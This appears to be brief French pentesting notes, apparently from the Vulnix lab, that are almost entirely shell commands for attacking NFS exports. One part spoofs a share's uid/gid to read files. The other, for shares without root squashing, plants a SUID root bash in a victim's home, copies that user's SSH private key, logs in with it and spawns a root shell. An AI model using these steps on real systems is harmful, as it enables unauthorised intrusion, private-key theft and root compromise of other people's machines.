showmount -e 192.168.2.64
mkdir /mnt/nfs
mount -t nfs -o vers=3 192.168.2.64:/nfspath /mnt/nfs
ls -ld /mnt/nfs (indique que les propriétaires sont uid=2008 et gid=2008 et la permission d'y accéder est interdite. nfs v4 montre le uid et gid de nobody)
groupadd --gid 2008 vulnix_group
useradd --uid 2008 --groups vulnix_group vulnix_user
sudo -u vulnix_user ls -l /mnt/nfsVoir aussi NfSpy
————————
Autre exploit si root squashfs n’est pas configuré
mkdir /tmp/nfs
mount -t nfs 10.10.2.3:/home /tmp/nfs -nolock
cp /home/r0cker/bash /tmp/nfs/georges #s'assurer de la compatibilite du bash. utiliser un binaire compatible avec le système à exploiter
sudo chown root /tmp/nfs/georges/bash
sudo chmod +s /tmp/nfs/georges/bash
sudo chmod go+x /tmp/nfs/georges/bash
cp /tmp/nfs/georges/.ssh/id_rsa ~
ssh -i ~/id_rsa georges@10.10.2.3
./bash -p
